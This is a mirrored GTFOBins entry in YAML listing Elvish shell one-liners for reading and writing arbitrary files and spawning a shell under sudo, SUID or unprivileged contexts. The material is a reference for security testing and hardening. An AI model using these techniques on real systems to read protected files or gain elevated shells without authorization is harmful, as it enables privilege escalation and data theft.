mirror of
https://github.com/GTFOBins/GTFOBins.github.io.git
synced 2026-03-07 06:31:33 +01:00
25 lines
385 B
Plaintext
25 lines
385 B
Plaintext
---
|
|
functions:
|
|
file-read:
|
|
- code: |-
|
|
elvish -c 'print (slurp </path/to/input-file)'
|
|
contexts:
|
|
sudo:
|
|
suid:
|
|
unprivileged:
|
|
file-write:
|
|
- code: |-
|
|
elvish -c 'print DATA >/path/to/output-file'
|
|
contexts:
|
|
sudo:
|
|
suid:
|
|
unprivileged:
|
|
shell:
|
|
- code: |-
|
|
elvish
|
|
contexts:
|
|
sudo:
|
|
suid:
|
|
unprivileged:
|
|
...
|